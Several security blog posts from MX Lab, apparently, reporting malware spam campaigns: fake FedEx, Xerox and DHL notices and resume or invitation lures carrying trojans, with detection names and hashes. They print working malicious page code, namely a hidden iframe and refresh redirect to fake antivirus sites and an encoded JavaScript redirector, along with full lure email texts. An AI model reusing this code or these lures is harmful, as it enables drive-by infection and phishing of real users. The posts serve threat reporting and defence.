The spam email had the subject “Your wife photos attached”, a very short body content ” Your wife photos” and the attached file rooster.zip.

At first, we thought this was some new email security treath so we investigated the ZIP archive. Once extracted the file rooster.jpg was available. The filename does not end with .exe or the combination of many spaces with at the end .exe so we opened the JPEG and got this spam advertisment for Viagra, Cialis and VPXL.

The instructions, if you are interested, is to go to med242.ru which leads to the web site of the Canadian Pharmacy.

I can understand that spammers try different techniques but this one is, in my humble opinion, not a very good one. What a hassle to read the message.

Possible subjects:

Fedex Invoice Copy N25524750
Fedex Item Status N4347526
Fedex Shipment Status N0919106
Fedex Tracking Number N7897143

The body of the email does not contains any text but only an embedded image.

The email has the attachment  FEDEXInvoiceEE438252OP.zip. The 36 kB large file FedexInvoice_EE776129.exe is extracted from the zip archive.

At the time of writing, only 8 of the 42 AV engines at Virus Total did detect the trojan. The trojan is known as W32/Agent.JBI (Authentium), Suspicious:W32/Malware!Gemini (F-Secure), TrojanDropper:Win32/Oficla.T (Microsoft), a variant of Win32/Kryptik.GHC (NOD32).

Virus Total permlink and MD5: 2587d5dc4b18e652532e556ac26f2290

Scan from a Xerox WorkCentre Pro $6208924
Scan from a Xerox WorkCentre Pro #7943943
Scan from a Xerox WorkCentre Pro N9700617

Body of the email:

Please open the attached document. It was scanned and sent to you using a Xerox
WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set
Device Name: XRX6919AA7ACDB46116749

For more information on Xerox products and solutions, please visit

http://www.xerox.com

The email contains a ZIP archive named Tax report.zip with the 56 kB large document Xerox_doc.exe inside.

Virus Total permlink and MD5: eadf133be4dc58050626a5fd194fc546.

Resume emails with attached file Resume.html leads to rogue AV software
Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

We just managed to get a real sample of the malware and a working web site that hosts the malicious scripts and fake anti virus screens. In a comment on one of our blog posts, a writer has delivered us the following URL hxxp://kidstylesource.com/x.html.

When we tried this one we got the iframe scripting that is used in this campaign:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://cetogilco.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://protectionreader.in/media/index.php?
xml=back&rnd=img&nid=151&hash=ecard&c=4" style="visibility: hidden;" height="1" width="1">
</iframe>

</body></html>

We soon got the following screen in our browser and a pop up window with the message that our system is infected. Oh, yes, we continue now to see what happens. Do not try this at home!

After clicking on OK we got a screen that starts scanning the computer system. The progress bar will advance very fast for such an anti virus scanner and the first alleged infections are found on your system.

A new popup will appear with a Windows Security Alert when the scan is finished. When we click on the button Remove all we got the option to download the file 164 kB large file antivirus.exe.

When submitting this file to Virus Total, 19 of the 42 AV engines did detect the trojan with names like W32/Katusha.D.gen!Eldorado (Authentium), W32/Katusha.D.gen!Eldorado (F-Prot), Mal/FakeAV-EI (Sophos) or TROJ_FAKEAV.SMDO (Trend Micro).

Virus Total permlink and MD5: b9734f1148c03a7f90ad77cb81dc6f1d.

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE=”Javascript”><!–//function xhtmldecode(x){document.write(unescape(x))}function runit(){x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)}runit()//–></script>

When opening the attached HTML file you are directed to a web site witht he following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogua anti virus software antivirus_24.exe as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

Common subjects are:

DHL Delivery. Please get your parcel NR7883
DHL Delivery. Get your parcel NR7308
DHL Delivery. Get your parcel ID0290
DHL Delivery Service. Error in delivery address
DHL International. Your Parcel Number 0066
DHL Services. Get your parcel ID212
DHL Servise. Parcel number 3005
….

The body of the email:

Dear customer.

We were not able to deliver your package to your address!

Reason:” incorrect address “
Please pick up your package in local DHL office.
Scheduled Delivery: 21-August-2010

Attention!
The post label is attached to this e-mail.
We kindly ask you to print it and take it to the post office to pick up the package.

Thank you!

The trojan is known as TROJ_OFICLA.AMG (TrendMicro), Trojan:Win32/Oficla.V (Microsoft), W32/Trojan3.BXP (F-Prot), Mal/EncPk-AX (Sophos), Trojan.Oficla.AC (BitDefender).

The attached ZIP file is approx. 44 kB large and is in the format of: Print_label_ID347a.zip. Once extracted, an .exe file is present from the archive.

Virus Total permlink and MD5: 5d16e73e05c8e03325e6971781b0af78.

The following email subjects are being used:

Another candidate brought to you
EBOD Meeting MEC Update
Fw: New Taxes Coming
Summary of payments

The email body also changes with every new email version. Here are some examples:

Enjoy… email with questions.. have a great safe weekend… still need more letters… get it done!

In Unity!

Chauncey Pennington

knuts,

Attached are two files showing the amounts paid this past year.
The files are in Lotus 1-2-3 but I think you can open these in Excel or the Open office spread sheet.
This is working very nicely.

Bradley Jacobs

Hi,

This is Charles Brand working as a Technical Team Lead in IBM with over 10 years of solid mainframe development experience. I am confident that my skills will match for this requirement.

Please find the resume as a word attachment. I am available at 404-353-5442 for a discussion. BTW I am in EST time zone.

Looking forward to work with you.

Thanks
Charles

I have attached part of that document toward the bottom so you can print it out for your friends.

“Excellence is an art won by training and habituation. We do not act rightly because we have virtue or excellence, but we rather have those because we have acted rightly. We are what we repeatedly do. Excellence, then, is not an act but a habit” Aristotle

Along with the subject and body content changes, the attached ZIP file also has different file names:

2010 MEC Update.zip
2010 Financing.123.zip
resume.zip
six_months.zip

At the time of writing, only 4 of the 42 AV engines at Virus Total did detect the treath. Virus Total permlink and MD5: 0f80c925e86d069e651eed8a4836f1be.

The following email subjects are being used:

Beauty and the Geek 2
First Birthday Invitation
fill this Passport form
In USA on August 15 and 16
Resume & Coverletter – Feedback
Status
Your reservation is confirmed – Ref: 12801/267373

The email body also changes with every new email version. Here are some examples:

Hi Joe,

I will be in USA on August 15, 16 and 17. I have a job interview on August 15 and available on August 16. I wonder if you and your partners will be available to catch up on any job prospect at your company.

I have attached my resume again with few changes.

Please let me know your availability. Thank you.

Best Regards,
Salvatore

Hello,

Thank you for making a booking through Allhotels

This voucher confirms that you have paid $ 1,100.00 as a deposit for the cost of the rooms and services detailed below. The guest must present this voucher, along with photo identification matching the guest name on this voucher, to the hotel on check-in.

The hotel will also ask for a valid credit card on check-in. This is to cover incidental expenses like meals, drinks, laundry, etc. Guests are responsible for payment of all extra charges direct to the hotel.

Please find the details in the attachment.

Hello All,

Please treat this as my personal invitation , Grace the occasion with your presence and bless my elder brother’s daughter on her first birthday.

Date: Sunday, August 15

Please find the venue details in the attachment.

Thanks,
Jordan Fish

Along with the subject and body content changes, the attached ZIP file also has different file names:

Resume.zip
invitation.zip

The attached ZIP archive is around  120 kB large, once extracted an .exe file is unpacked with the same name as the ZIP archive.

The trojan is known as Gen:Variant.Bredo.6 (Bitdefender), W32/Zbot.AN.test!Eldorado (F-Prot), W32/Trojan3.BXW (Authentium).

The following files will be created:

%Windir%\host32.exe
%Windir%\jh87uhnoe3\ewf32.nls
%Windir%\jh87uhnoe3\ewfrvbb.nls

The following directory will be created:

%Windir%\jh87uhnoe3

Several Windows registry modification are executed to the infected system.

At the time of writing, only 6 of the 42 AV engines at Virus Total did detect the treath. Virus Total permlink and MD5: 4150a1deee2bb6852095627df34defb3.

Join the MX Lab group on LinkedIn.

Today, MX Lab intercepted even more of those emails leading to a web site hxxp://clinique-fuer-schoene-haut.de/x.html. This site has the following malicious code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

After 4 second syou will get redirected to hxxp://hoopdotami.cz.cc/scanner5/?afid=24.

The brands we intercepted are Ikea, Macys, Snapfish, Zappos, SurveySpot, XM, Focus Point Global and Very Best Baking. Here are some screens of the emails.

More information regarding the treath can be found in the blog post Malicious emails lead to rogue AV software antivirus_24.exe.